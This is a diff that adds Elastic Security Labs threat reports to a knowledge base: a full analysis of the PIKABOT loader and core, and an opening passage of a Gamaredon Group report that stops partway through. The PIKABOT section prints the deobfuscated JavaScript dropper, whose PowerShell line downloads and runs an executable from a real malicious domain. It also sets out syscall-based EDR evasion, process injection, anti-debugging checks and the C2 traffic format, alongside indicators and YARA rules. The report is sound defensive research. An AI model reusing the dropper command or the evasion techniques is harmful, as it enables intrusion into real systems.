+During the development of this research, the ThreatLabz team at Zscaler released great [analysis](https://www.zscaler.com/blogs/security-research/d-evolution-pikabot) and insights into a sample overlapping with those in this post. We suggest reading their work along with ours to understand these PIKABOT changes comprehensively.
+
+### Key takeaways
+
+ - Fresh campaigns involving significant updates to the PIKABOT loader and core components  
+ - PIKABOT loader uses a new unpacking technique of combining scattered chunks of encrypted data in base64 format from `.data` section
+ - Changes in the core include toned-down obfuscation and in-line RC4 functions, plaintext configuration at runtime, removal of AES during network communications
+ - PIKABOT development appears as a work-in-progress, with future updates likely imminent
+ - Call-stack visibility using Elastic Security provides the ability to triage threats like PIKABOT rapidly
+
+#### PIKABOT campaign overview
+
+![PIKABOT execution flow](/assets/images/pikabot-i-choose-you/image17.png)
+
+
+As the new year started, PIKABOT distribution remained inactive until approximately two weeks ago. This new campaign on February 8th involved emails with hyperlinks that led to ZIP archive files containing a malicious obfuscated Javascript script. 
+
+![Obfuscated Javascript within ZIP archive](/assets/images/pikabot-i-choose-you/image21.png)
+
+
+Below are the contents of the obfuscated JavaScript file, showing the next sequence to download and execute PIKABOT’s loader using PowerShell.
+
+```JavaScript
+// deobfuscated
+var sites = ['https://gloverstech[.]com/tJWz9/', '', '']
+for (var i = 0x0; i < 3; i++)
+{
+	var obj = new ActiveXObject("WScript.Shell")
+	obj['Run']("powershell Invoke-WebRequest https://gloverstech[.]com/tJWz9/0.2343379541861872.dat -OutFile %SYSTEMDRIVE%\\Users\\Public\\Jrdhtjydhjf.exe; saps %SYSTEMDRIVE%\\Users\\Public\\Jrdhtjydhjf.exe")
+}
+```
+
+## PIKABOT loader
+
+### Loader stage 1
+
+To appear authentic, the developer tampered with a legitimate search and replace tool called ```grepWinNP3.exe``` from [this](https://github.com/rizonesoft/Notepad3) repository. Using our internal sandboxing project ([Detonate](https://www.elastic.co/security-labs/click-click-boom-automating-protections-testing-with-detonate)) and leveraging Elastic Defend’s [call stack feature](https://www.elastic.co/security-labs/peeling-back-the-curtain-with-call-stacks) provided a detailed trace of the execution, allowing us to pinpoint the entry point of malicious code. 
+
+An analysis of the call stack data reveals that execution begins at a call before offset ```0x81aa7``` within the malicious file; the execution then leaps to a memory allocation at a call prior to offset ```0x25d84```. Furthermore, it was observed that the process creation call stack is missing normal calls to ```KernelBase.dll!CreateProcessInternalW``` and ```ntdll.dll!NtCreateUserProcess```, due to the use of a syscall via shellcode execution residing in the [unbacked memory](https://www.elastic.co/security-labs/hunting-memory). By using this implementation, it will bypass user-mode hooks on WOW64 modules to evade EDR products. 
+
+![Alert call stack for PIKABOT loader](/assets/images/pikabot-i-choose-you/image8.png)
+
+
+Looking into the offset ```0x81aa7``` of the malicious file and conducting a side-by-side code comparison with a verified, benign version of the ```grepWinNP3.exe``` file, we identified something distinct and unusual: a hardcoded address to execute the PIKABOT loader, this marks the entrypoint of the PIKABOT loader.
+
+![Entrypoint to malicious code](/assets/images/pikabot-i-choose-you/image1.png)
+
+
+The malicious code employs heavy obfuscation, utilizing a technique where a jump (```JMP```) follows each assembly instruction. This approach significantly complicates analysis by disrupting the straightforward flow of execution.
+
+![Obfuscation involving a combination of instructions and jumps](/assets/images/pikabot-i-choose-you/image14.png)
+
+ 
+The loader extracts its stage 2 payload from the ```.text``` section, where it is stored in chunks of ```0x94``` bytes, before consolidating the pieces. It then employs a seemingly custom decryption algorithm, which utilizes bitwise operations. 
+
+![Decryption algorithm for stage 2 payload](/assets/images/pikabot-i-choose-you/image5.png)
+
+
+The next step of the process is to reflectively load the PE file within the confines of the currently executing process. This technique involves dynamically loading the PE file's contents into memory and executing it, without the need for the file to be physically written to disk. This method not only streamlines the execution process by eliminating the necessity for external file interactions but also significantly enhances stealth by minimizing the digital footprint left on the host system.
+
+![Reflectively loading PE](/assets/images/pikabot-i-choose-you/image25.png)
+
+
+### Loader stage 2
+
+The stage 2 loader, tasked with initializing the PIKABOT core within a newly established process, employs a blend of code and string obfuscation techniques similar to those found in the core itself. In addition to its obfuscation capabilities, the loader incorporates a series of advanced anti-debugging countermeasures.
+
+#### Anti-debugging
+
+The malware utilizes specific NTDLL ```Zw``` APIs for a variety of operations, including debugger detection, process creation, and injection, aiming to stay under the radar of detection mechanisms and evade EDR (Endpoint Detection and Response) user-land hooking, as well as debugging attempts. 
+
+It executes syscalls directly, bypassing conventional API calls that are more susceptible to monitoring and interception. It uses a wrapper function that facilitates the execution of syscalls in 64-bit mode which takes a hash of a ```Zw``` API name as a parameter.
+
+![Function used to execute syscall by hash](/assets/images/pikabot-i-choose-you/image24.png)
+
+
+The wrapper function extracts the syscall ID by parsing the loaded NTDLL and matching the hash of the ```Zw``` function name. After finding the correct syscall ID, it uses the ```Wow64Transition``` Windows API to execute the syscall in 64-bit mode.
+
+![Control flow graph showing syscall passed to ```WoW64Transition```](/assets/images/pikabot-i-choose-you/image11.png)
+
+
+Note that the parameters needed are pushed on the stack before the wrapper is called, the following example showcases a ```ZwQueryInformationProcess``` call with the ```ProcessInformationClass``` set to ```ProcessDebugPort```(7):
+
+![Syscall parameters pushed on stack](/assets/images/pikabot-i-choose-you/image6.png)
+
+
+The malware employs a series of anti-debugging techniques designed to thwart detection by debugging and forensic tools. These techniques include:
+ - Calling ```ZwQuerySystemInformation``` with the ```SystemKernelDebuggerInformation``` parameter to detect the presence of kernel debuggers.
+ - Calling ```ZwQueryInformationProcess``` with the ```ProcessInformationClass``` set to ```ProcessDebugPort``` to identify any debugging ports associated with the process.
+ - Calling ```ZwQueryInformationProcess``` again, but with the ```ProcessInformationClass``` set to ```ProcessDebugFlags``` parameter, to ascertain if the process has been flagged for debugging.
+ - Inspecting the Process Environment Block (PEB) for the ```BeingDebugged``` flag, which indicates if the process is currently being debugged.
+ - Using ```GetThreadContext``` to detect hardware breakpoints.
+Scanning the list of currently running processes to identify any active debugging or forensic tools.
+
+![Decompilation of debugging checks](/assets/images/pikabot-i-choose-you/image9.png)
+
+
+Interestingly, we discovered a bug where some of the process names it checks have their first byte zeroed out, this could suggest a mistake by the malware’s author or an unwanted side-effect added by the obfuscation tool. The full list of process names that are checked can be found at the end of this article.
+
+![Process names with missing first byte](/assets/images/pikabot-i-choose-you/image15.png)
+
+
+#### Execution
+
+The loader populates a global variable with the addresses of essential APIs from the NTDLL and KERNEL32 libraries. This step is pivotal for the malware's operation, as these addresses are required for executing subsequent tasks. Note that the loader employs a distinct API name hashing algorithm, diverging from the one previously used for `Zw` APIs.
+
+![APIs retrieved for loading core component](/assets/images/pikabot-i-choose-you/image19.png)
+
+
+Below is the reconstructed structure:
+
+```C
+struct global_variable
+{
+  int debugger_detected;
+  void* LdrLoadDll;
+  void* LdrGetProcedureAddress;
+  void* RtlAllocateHeap;
+  void* RtlFreeHeap;
+  void* RtlDecompressBuffer;
+  void* RtlCreateProcessParametersEx;
+  void* RtlDestroyProcessParameters;
+  void* ExitProcess;
+  void* CheckRemoteDebuggerPresent;
+  void* VirtualAlloc;
+  void* GetThreadContext;
+  void* VirtualFree;
+  void* CreateToolhelp32Snapshot;
+  void* Process32FirstW;
+  void* Process32NextW;
+  void* ntdll_module;
+  void* kernel32_dll;
+  int field_48;
+  uint8_t* ptr_decrypted_PIKABOT_core;
+  int decrypted_PIKABOT_core_size;
+  TEB* TEB;
+};
+```
+Loader structure 
+
+The malware then consolidates bytes of the PIKABOT core that are scattered in the `.data` section in base64-encoded chunks, which is noteworthy when compared to a previous version which loaded a set of PNGs from its resources section.
+
+![Functions used to retrieve core payload in chunks](/assets/images/pikabot-i-choose-you/image2.png)
+
+
+It executes a sequence of nine distinct functions, each performing similar operations but with varying arguments. Each function decrypts an RC4 key using an in-line process that utilizes strings that appear legitimate. The function then base64 decodes each chunk before decrypting the bytes.
+
+![Decryption functions using RC4 and base64](/assets/images/pikabot-i-choose-you/image3.png)
+
+
+After consolidating the decrypted bytes, it uses the ```RtlDecompressBuffer``` API to decompress them.
+
+
+![PIKABOT loader using decompression function](/assets/images/pikabot-i-choose-you/image27.png)
+
+
+The loader creates a suspended instance of ```ctfmon.exe``` using the ```ZwCreateUserProcess``` syscall, a tactic designed to masquerade as a legitimate Windows process. Next, it allocates a large memory region remotely via the ```ZwAllocateVirtualMemory``` syscall to house the PIKABOT core's PE file.
+
+Subsequently, the loader writes the PIKABOT core into the newly allocated memory area using the ```ZwWriteVirtualMemory``` syscall. It then redirects the execution flow from ```ctfmon.exe``` to the malicious PIKABOT core by calling the ```SetContextThread``` API to change the thread's execution address. Finally, it resumes the thread with ```ZwResumeThread``` syscall.
+
+![Syscall execution of core payload](/assets/images/pikabot-i-choose-you/image13.png)
+
+
+## PIKABOT core
+
+The overall behavior and functionality of the updated PIKABOT core are similar to previous versions: the bot collects initial data from the victim machine and presents the threat actor with command and control access to enable post-compromise behavior such as command-line execution, discovery, or launching additional payloads through injection. 
+
+The notable differences include:
+ - New style of obfuscation with fewer in-line functions
+ - Multiple implementations for decrypting strings
+ - Plaintext configuration at runtime, removal of JSON format 
+ - Network communication uses RC4 plus byte swapping, removal of AES
+
+### Obfuscation 
+
+One of the most apparent differences is centered around the obfuscation of PIKABOT. This version contains a drastically less obfuscated binary but provides a familiar feel to older versions. Instead of a barrage of in-line RC4 functions, there are only a few left after the new update. Unfortunately, there is still a great deal of obfuscation applied to global variables and junk instructions.  
+
+Below is a typical example of junk code being inserted in between the actual malware’s code, solely to extend analysis time and add confusion. 
+
+![Obfuscation using global variables](/assets/images/pikabot-i-choose-you/image18.png)
+
+
+### String Decryption
+
+As mentioned previously, there are still some in-line RC4 functions used to decrypt strings. In previous versions, the core used base64 encoding as an additional step in combination with using AES and RC4 to obscure the strings; in this core version, we haven’t seen base64 encoding or AES used for string decryption.
+
+Here’s an instance of a remaining in-line RC4 function used to decrypt the hardcoded mutex. In this version, PIKABOT continues its trademark use of legitimate strings as the RC4 key to decrypt data.
+
+![In-line RC4](/assets/images/pikabot-i-choose-you/image12.png)
+
+
+![String decryption using RC4 with benign strings](/assets/images/pikabot-i-choose-you/image16.png)
+
+
+In this new version, PIKABOT includes a different implementation for string obfuscation by using stack strings and placing individual characters into an array in a randomized order. Below is an example using ```netapi32.dll```:
+
+
+![Stack string placement using ```netapi32.dll```](/assets/images/pikabot-i-choose-you/image22.png)
+
+
+### Anti-debugging
+
+In terms of anti-debugging in this version, PIKABOT checks the ```BeingDebuggedFlag``` in the PEB along with using ```CheckRemoteDebuggerPresent```. In our sample, a hardcoded value (```0x2500```) is returned if a debugger is attached. These checks unfortunately are not in a single place, but scattered in different places throughout the binary, for example right before network requests are made.
+
+![Debugger check](/assets/images/pikabot-i-choose-you/image9.png)
+
+
+### Execution
+
+Regarding execution and overall behaviors, PIKABOT’s core closely follows the execution flow of older versions. Upon execution, PIKABOT parses the PEB and uses API hashing to resolve needed libraries at runtime. Next, it validates the victim machine by verifying the language identifier using ```GetUserDefaultLangID```. If the `LangID` is set to Russian (```0x419```) or Ukranian (```0x422```), the malware will immediately stop its execution.
+
+![Language check](/assets/images/pikabot-i-choose-you/image26.png)
+
+ 
+After the language check, PIKABOT creates a mutex to prevent reinfection on the same machine. Our sample used the following mutex: ```{6F70D3AF-34EF-433C-A803-E83654F6FD7C}```
+
+Next, the malware will generate a UUID from the victim machine using the system volume number in combination with the hostname and username. PIKABOT will then generate a unique RC4 key seeded by ```RtlRandomEx``` and then place the key into the config structure to be used later during its network communications.
+
+### Initial Collection
+
+The next phase involves collecting victim machine information and placing the data into a custom structure that will then be encrypted and sent out after the initial check-in request. The following actions are used to fingerprint and identify the victim and their network:
+ - Retrieves the name of the user associated with the PIKABOT thread
+ - Retrieves the computer name 
+ - Gets processor information
+ - Grabs display device information using ```EnumDisplayDevicesW```
+ - Retrieves domain controller information using ```DsGetDcNameW```
+ - Collects current usage around physical and virtual memory using ```GlobalMemoryStatusEx```
+ - Gets the window dimensions using ```GetWindowRect``` used to identify sandbox environments
+ - Retrieves Windows OS product information using ```RtlGetVersion```
+ - Uses ```CreateToolhelp32Snapshot``` to retrieve process information
+
+![Victim information retrieved such as username, computer name, etc](/assets/images/pikabot-i-choose-you/image23.png)
+
+
+### Config
+
+One strange development decision in this new version is around the malware configuration. At runtime, the configuration is in plaintext and located in one spot in memory. This does eventually get erased in memory. We believe this will only temporarily last as previous versions protected the configuration and it has become a standard expectation when dealing with prevalent malware families. 
+
+![Configuration in plaintext at core runtime](/assets/images/pikabot-i-choose-you/image4.png)
+
+
+### Network
+
+PIKABOT performs network communication over HTTPS on non-traditional ports (2967, 2223, etc) using User-Agent ```Microsoft Office/14.0 (Windows NT 6.1; Microsoft Outlook 14.0.7166; Pro)```. The build number of the PIKABOT core module is concatenated together from the config and can be found being passed within the encrypted network requests, the version we analyzed is labeled as ```1.8.32-beta```.
+
+![New PIKABOT version on the stack](/assets/images/pikabot-i-choose-you/image10.png)
+
+
+On this initial check-in request to the C2 server, PIKABOT registers the bot while sending the previously collected information encrypted with RC4. The RC4 key is sent in this initial packet at offset (```0x10```). As mentioned previously, PIKABOT no longer uses AES in its network communications. 
+
+```
+POST https://158.220.80.167:2967/api/admin.teams.settings.setIcon HTTP/1.1
+Cache-Control: no-cache
+Connection: Keep-Alive
+Pragma: no-cache
+Accept: */*
+Accept-Encoding: gzip, deflate, br
+Accept-Language: en-US,en;q=0.8
+User-Agent: Microsoft Office/14.0 (Windows NT 6.1; Microsoft Outlook 14.0.7166; Pro)
+Content-Length: 6778
+Host: 158.220.80.167:2967
+
+00001a7600001291000016870000000cbed67c4482a40ad2fc20924a06f614a40256fca898d6d2e88eecc638048874a8524d73037ab3b003be6453b7d3971ef2d449e3edf6c04a9b8a97e149a614ebd34843448608687698bae262d662b73bb316692e52e5840c51a0bad86e33c6f8926eb850c2...
+```
+_PIKABOT initial check-in request_
+
+For each outbound network request, PIKABOT randomly chooses one of the following URI’s:
+
+```
+/api/admin.conversations.convertToPrivate
+/api/admin.conversations.getConversationPrefs
+/api/admin.conversations.restrictAccess.removeGroup
+/api/admin.emoji.add
+/api/admin.emoji.addAlias
+/api/admin.emoji.list
+/api/admin.inviteRequests.approved.list
+/api/admin.teams.admins.list
+/api/admin.teams.settings.setIcon
+/api/admin.usergroups.addTeams
+/api/admin.users.session.reset
+/api/apps.permissions.users.list
+```
+_List of URI’s used in PIKABOT C2 requests_
+
+Unlike previous versions by which victim data was placed in a structured format using JSON, the data within these requests are raw bytes. The first 16 bytes are used to pass specific config information (bot command ID, byte shift, etc). The next 32-bytes embed the RC4 key for the session where then the encrypted data is followed in the request. 
+
+There is one additional transformation where the developers added a random shift of bytes that occurs at runtime. This number (`0x18`) at offset (`0xF`) in the example request below represents the number of bytes to shift from the end of the encrypted data to the start of the encrypted data. In our example, to successfully decrypt the data, the last 18 bytes would need to be placed in front of bytes (`0xDA 0x9E`). 
+
+![Hex view of network request on initial check-in](/assets/images/pikabot-i-choose-you/image20.png)
+
+
+### Bot Functionality
+
+In terms of the core bot functionality, it is similar to previous versions:  executing commands, performing discovery, as well as process injection capabilities. From our perspective, it still seems very much like a work in progress. One command ID (`0x982`) is an empty function, in another case, there are three unique command ID’s pointed to the same function. These indicate that this software is not quite complete.
+
+
+| Command ID | Description |
+|------------|-------------|
+| 0x1FED | Beacon timeout |
+| 0x1A5A | Exits the PIKABOT process |
+| 0x2672 | Includes obfuscation, but appears to not do anything meaningful |
+| 0x246F | Creates file on disk and modifies registry tied to configuration |
+| 0xACB | Command-line execution with output |
+| 0x36C | PE inject in a remote process |
+| 0x792 | Shellcode inject in a remote process |
+| 0x359, 0x3A6, 0x240 | Command-line execution similar to 0xACB, uses custom error code (0x1B3) |
+| 0x985 | Process enumeration, similar to initial victim collection enumeration |
+| 0x982 | Empty function |
+
+### Malware and MITRE ATT&CK
+
+Elastic uses the [MITRE ATT&CK](https://attack.mitre.org/) framework to document common tactics, techniques, and procedures that advanced persistent threats use against enterprise networks.
+
+#### Tactics
+Tactics represent the _why_ of a technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an action.
+
+ - [Initial Access](https://attack.mitre.org/tactics/TA0001)
+ - [Execution](https://attack.mitre.org/tactics/TA0002/)
+ - [Defense Evasion](https://attack.mitre.org/tactics/TA0005/)
+ - [Discovery](https://attack.mitre.org/tactics/TA0007)
+ - [Command and Control](https://attack.mitre.org/tactics/TA0011)
+ - [Exfiltration](https://attack.mitre.org/tactics/TA0010/)
+ 
+#### Techniques
+Techniques represent how an adversary achieves a tactical goal by performing an action.
+
+ - [Phishing](https://attack.mitre.org/techniques/T1566/)
+ - [User Execution: Malicious Link](https://attack.mitre.org/techniques/T1204/001/)
+ - [Reflective Code Loading](https://attack.mitre.org/techniques/T1620/)
+ - [System Information Discovery](https://attack.mitre.org/techniques/T1082/)
+ - [Process Injection](https://attack.mitre.org/techniques/T1055/)
+ - [Encrypted Channel](https://attack.mitre.org/techniques/T1573/)
+
+## Detecting malware
+
+### Prevention
+
+ - [Network Module Loaded from Suspicious Unbacked Memory](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_network_module_loaded_from_suspicious_unbacked_memory.toml)
+ - [Shellcode Execution from Low Reputation Module](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_shellcode_execution_from_low_reputation_module.toml)
+ - [Suspicious Memory Write to a Remote Process](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_suspicious_memory_write_to_a_remote_process.toml)
+ - [Suspicious Remote Memory Allocation](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_suspicious_remote_memory_allocation.toml)
+ - [Process Creation with Unusual Mitigation](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_process_creation_with_unusual_mitigation.toml)
+ - [Windows.Trojan.PikaBot](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_PikaBot.yar)
+
+#### YARA
+
+Elastic Security has created YARA rules to identify this activity. Below are YARA rules to identify [PIKABOT](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_PikaBot.yar):
+
+```
+rule Windows_Trojan_Pikabot_5441f511 {
+    meta:
+        author = "Elastic Security"
+        creation_date = "2024-02-15"
+        last_modified = "2024-02-15"
+        license = "Elastic License v2"
+        description = "Related to PIKABOT core"
+        os = "Windows"
+        arch = "x86"
+        threat_name = "Windows.Trojan.PIKABOT"
+
+    strings:
+        $handler_table = { 72 26 [6] 6F 24 [6] CB 0A [6] 6C 03 [6] 92 07 }
+        $api_hashing = { 3C 60 76 ?? 83 E8 20 8B 0D ?? ?? ?? ?? 6B FF 21 }
+        $debug_check = { A1 ?? ?? ?? ?? FF 50 ?? 50 50 80 7E ?? 01 74 ?? 83 7D ?? 00 75 ?? }
+        $checksum = { 55 89 E5 8B 55 08 69 02 E1 10 00 00 05 38 15 00 00 89 02 5D C3 }
+        $load_sycall = { 8F 05 ?? ?? ?? ?? 83 C0 04 50 8F 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 04 A3 ?? ?? ?? ?? 31 C0 64 8B 0D C0 00 00 00 85 C9 }
+        $read_xbyte_config = { 8B 43 04 8B 55 F4 B9 FC FF FF FF 83 C0 04 29 D1 01 4B 0C 8D 0C 10 89 4B 04 85 F6 ?? ?? 89 16 89 C3 }
+    condition:
+        2 of them
+}
+
+rule Windows_Trojan_Pikabot_95db8b5a {
+    meta:
+        author = "Elastic Security"
+        creation_date = "2024-02-15"
+        last_modified = "2024-02-15"
+        license = "Elastic License v2"
+        description = "Related to PIKABOT loader"
+        os = "Windows"
+        arch = "x86"
+        threat_name = "Windows.Trojan.PIKABOT"
+
+    strings:
+        $syscall_ZwQueryInfoProcess = { 68 9B 8B 16 88 E8 73 FF FF FF }
+        $syscall_ZwCreateUserProcess = { 68 B2 CE 2E CF E8 5F FF FF FF }
+        $load_sycall = { 8F 05 ?? ?? ?? ?? 83 C0 04 50 8F 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 04 A3 ?? ?? ?? ?? 31 C0 64 8B 0D C0 00 00 00 85 C9 }
+        $payload_chunking = { 8A 84 35 ?? ?? ?? ?? 8A 95 ?? ?? ?? ?? 88 84 1D ?? ?? ?? ?? 88 94 35 ?? ?? ?? ?? 02 94 1D ?? ?? ?? ?? }
+        $loader_rc4_decrypt_chunk = { F7 FF 8A 84 15 ?? ?? ?? ?? 89 D1 8A 94 1D ?? ?? ?? ?? 88 94 0D ?? ?? ?? ?? 8B 55 08 88 84 1D ?? ?? ?? ?? 02 84 0D ?? ?? ?? ?? 0F B6 C0 8A 84 05 ?? ?? ?? ?? 32 04 32 }
+    condition:
+        2 of them
+}
+```
+
+## Observations
+
+All observables are also available for [download](https://github.com/elastic/labs-releases/tree/main/indicators/pikabot) in both ECS and STIX format.
+
+The following observables were discussed in this research.
+
+| Observable |    Type     | Name        | Reference   |
+|------------|-------------|-------------|-------------|
+| `2f66fb872c9699e04e54e5eaef982784b393a5ea260129a1e2484dd273a5a88b` | SHA-256 | `Opc.zip` | Zip archive holding obfuscated Javascript |
+| `ca5fb5814ec62c8f04936740aabe2664b3c7d036203afbd8425cd67cf1f4b79d`| SHA-256 | `grepWinNP3.exe` | PIKABOT loader |
+| `139.84.237[.]229:2967` | ipv4-addr | | PIKABOT C2 server |
+| `85.239.243[.]155:5000` | ipv4-addr | | PIKABOT C2 server |
+| `104.129.55[.]104:2223` | ipv4-addr | | PIKABOT C2 server |
+| `37.60.242[.]85:9785` | ipv4-addr | | PIKABOT C2 server |
+| `95.179.191[.]137:5938` | ipv4-addr | | PIKABOT C2 server |
+| `65.20.66[.]218:5938` | ipv4-addr | PIKABOT C2 server |
+| `158.220.80[.]157:9785` | ipv4-addr | PIKABOT C2 server |
+| `104.129.55[.]103:2224` | ipv4-addr | PIKABOT C2 server |
+| `158.220.80[.]167:2967` | ipv4-addr | PIKABOT C2 server |
+| `entrevientos.com[.]ar` | domain | | Hosting infra for zip archive |
+| `gloverstech[.]com` | domain | | Hosting infra for PIKABOT loader |
+
+## References
+
+The following were referenced throughout the above research:
+ - [https://www.zscaler.com/blogs/security-research/d-evolution-PIKABOT](https://www.zscaler.com/blogs/security-research/d-evolution-pikabot)
+ - [https://x.com/Cryptolaemus1/status/1755655639370514595?s=20](https://x.com/Cryptolaemus1/status/1755655639370514595?s=20)
+
+## Appendix
+
+```
+Process Name Checks
+tcpview.exe
+filemon.exe
+autoruns.exe
+autorunsc.exe
+ProcessHacker.exe
+procmon.exe
+procexp.exe
+idaq.exe
+regmon.exe
+idaq64.exe
+
+
+x32dbg.exe
+x64dbg.exe
+Fiddler.exe
+httpdebugger.exe
+cheatengine-i386.exe
+cheatengine-x86_64.exe
+cheatengine-x86_64-SSE4-AVX2.exe
+
+
+PETools.exe
+LordPE.exe
+SysInspector.exe
+proc_analyzer.exe
+sysAnalyzer.exe
+sniff_hit.exe
+windbg.exe
+joeboxcontrol.exe
+joeboxserver.exe
+ResourceHacker.exe
+
+
+ImmunityDebugger.exe
+Wireshark.exe
+dumpcap.exe
+HookExplorer.exe
+ImportREC.exe
+```
\ No newline at end of file
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/playing_defense_against_gamaredon_group.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/playing_defense_against_gamaredon_group.md
new file mode 100644
index 0000000000000..17e425d5f7bd8
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/playing_defense_against_gamaredon_group.md
@@ -0,0 +1,393 @@
+---
+title: "Playing defense against Gamaredon Group"
+slug: "playing-defense-against-gamaredon-group"
+date: "2022-06-21"
+description: "Learn about the recent campaign of a Russia-based threat group known as Gamaredon Group.  This post will review these details and provide detection strategies."
+author:
+  - slug: daniel-stepanic
+  - slug: andrew-pease
+  - slug: seth-goodwin
+  - slug: elastic-security-intelligence-analytics-team
+image: "blog-thumb-digital-shield.jpg"
+category:
+  - slug: activity-group
+---
+
+For several months, the Intelligence & Analytics team at Elastic Security has tracked an ongoing adversary campaign appearing to target Ukranian government officials. Based on our monitoring, we believe [Gamaredon Group](https://attack.mitre.org/groups/G0047/), a suspected Russia-based threat group, is behind this campaign. Our observations suggest a significant overlap between tactics, techniques, and procedures (TTPs) included within this campaign and [public reporting](https://www.anomali.com/resources/whitepapers/malicious-activity-aligning-with-gamaredon-ttps-targets-ukraine)<sup>1</sup>.
+
+This campaign has produced and deployed updated lures on a near-daily basis that appear to target multiple Ukrainian government departments. With this high operational tempo and aggressive targeting, they consistently employ a cluster of initial access techniques and procedures. Over the past four months, these techniques have consisted of spearphishing, remote document template injection, startup folder persistence, VBA/VBScript languages, and Dynamic DNS command & control infrastructure.
+
+In this post, we’ll walk through the campaign details, reviewing the implementation while also providing solutions such as detection strategies through the use of Elastic’s [Event Query Language (EQL)](https://www.elastic.co/blog/introducing-event-query-language).
+
+## Campaign Details
+
+The earliest identified [infrastructure](https://www.virustotal.com/gui/domain/libre-templates.ddns.net/details) indicates this campaign has been active since August 2019. The first [sample](https://www.virustotal.com/gui/file/481eee236eadf6c947857820d3af5a397caeb8c45791f0bbdd8a21f080786e75/details) leveraging this domain was submitted to VirusTotal in early September 2019. Spearphishing emails like the example in Figure 1 (below) were used to deliver a malicious attachment and demonstrate Gamaredon Group’s attempt to impersonate an anti-corruption activist. This example targeted the National Security and Defense Council of Ukraine and dates to January 17, 2020.
+
+![](/assets/images/playing-defense-against-gamaredon-group/email_redact1.png)
+
+_Figure 1 - Spearphishing email sent to National Security and Defense Council of Ukraine_
+
+A typical lure document might masquerade as an information request to the Ministry of Foreign Affairs of Ukraine. These manufactured lures included official logos stolen from governmental offices of Ukraine and impersonated diplomats known to their targets.
+
+![](/assets/images/playing-defense-against-gamaredon-group/lure1.png)
+
+_Figure 2 - Lure document - Ministry of Foreign Affairs in Ukraine request_
+
+To improve their chances of success, they customize the request around the same date of the campaign and include urgent requests for action. These efforts are indicative of necessity.
+
+![](/assets/images/playing-defense-against-gamaredon-group/lure2.jpg)
+
+_Figure 3 - Lure document - Information request related to NSDC Head of Ukraine_
+
+Often, the call to action first required the victim to open an attached lure document. A user who attempted to open one of these malicious attachments would see a perfectly convincing decoy document, while a sequence of invisible actions occurred behind the screen. These documents end up leveraging a technique known as [template injection](https://attack.mitre.org/techniques/T1221/), a method of loading remotely hosted Microsoft Word document templates.
+
+Microsoft Word objects function similarly to compressed archives and have properties defined using Microsoft’s Open Office XML (OOXML) format. Within the decompressed word/\_rels/ subdirectory, the file settings.xml.rels contained a network location where a remotely hosted template was retrieved as depicted in Figure 4.
+
+![](/assets/images/playing-defense-against-gamaredon-group/template1.jpg)
+
+_Figure 4 - Excerpt from Settings.xml.rels_
+
+Each external URL within these lures were configured to point to Dynamic DNS providers (ddns.net, hopto.org). Dynamic DNS provides automation around updating a name server in the Domain Name System (DNS). By adopting this technique, this shows the adversary’s attempt to mask their ownership and obscure atomic indicator associations through the use of transient infrastructures, such as Dynamic DNS.
+
+![](/assets/images/playing-defense-against-gamaredon-group/template_download.jpg)
+
+_Figure 5 - Word startup screen showing download of remote document template_
+
+The remote templates are macro-enabled, configured to execute VBA macro code that persists a VBScript object in the victim’s startup folder as a foothold. We assess the objective of this initial code is used to identify the victim and to protect the second-stage payload that is intended only for their targeted victims. In the next sections, we will review the document’s metadata and macro code found in a recent [sample](https://www.virustotal.com/gui/file/feb0596e9735e03ae929d9b5ee862da19e16e5cdf57dd2a795205e591a55940f/details).
+
+## Document metadata analysis
+
+In malicious campaigns, infrastructure is commonly created for specific targets. This serves multiple purposes, but frequently it’s done to track implants and frustrate automated research and analysis. As analysts, this gives us some insight into the adversaries’ maturity, experience, and resources. As an example, an adversary who reuses lure documents or templates may be less experienced, not interested in high-value targets, or using monetized infrastructure from previous campaigns.
+
+Analyzing the metadata from the lure document and template allows us to see when these weaponized documents were created, as well as identify any associations between different elements of the campaign.
+
+As we can see in Figure 6, the lure document was created on December 24, 2019 by the Author “ШУРИК”. In Figure 7, we can see that the Author is the same as observed in the lure document (ШУРИК). Additionally, we can see that the remote template was created on December 12, 2019 and then modified on December 24, 2019. There were 5 modifications to it, indicating that it has been used for 5 campaigns in 12 days — or about 2.5 days per campaign. With moderate confidence, this tells us that the remote template is likely reused and updated with new macros for new campaigns, and that they were created by the same Author (or at a minimum, the same instance of Microsoft Word).
+
+As an analyst note, we see different tool markings that indicate this was created by a Russian speaker (Russian Author, Russian Language Code, Cyrillic character set, and the usage of Reanimator Extreme Edition). While we can use those as information to help inform overall analysis, this information can be seeded — so it doesn’t prove anything definitively on its own. In this case, this aligns with other open source analysis linking this to the Gamaredon Group, which is believed to be Russian in origin.
+
+|                        |                                                                         |
+| ---------------------- | ----------------------------------------------------------------------- |
+| File Size              | 46 kB                                                                   |
+| File Type Extension    | docx                                                                    |
+| MIME Type              | application/vnd.openxmlformats-officedocument.wordprocessingml.document |
+| Last Modified By       | ШУРИК                                                                   |
+| Revision Number        | 2                                                                       |
+| Create Date            | 2019:12:24 15:58:00Z                                                    |
+| Modify Date            | 2019:12:24 16:10:00Z                                                    |
+| Template               | pos.dot                                                                 |
+| Total Edit Time        | 2 minutes                                                               |
+| Pages                  | 1                                                                       |
+| Words                  | 195                                                                     |
+| Characters             | 1114                                                                    |
+| Application            | Microsoft Office Word                                                   |
+| Lines                  | 9                                                                       |
+| Paragraphs             | 2                                                                       |
+| Company                | Reanimator Extreme Edition                                              |
+| Characters With Spaces | 1307                                                                    |
+
+_Figure 6 - Metadata from the lure document (truncated for length)_
+
+|                        |                            |
+| ---------------------- | -------------------------- |
+| File Size              | 44 kB                      |
+| File Type Extension    | doc                        |
+| MIME Type              | application/msword         |
+| Language Code          | Russian                    |
+| Author                 | ШУРИК                      |
+| Template               | pos.dot                    |
+| Last Modified By       | ШУРИК                      |
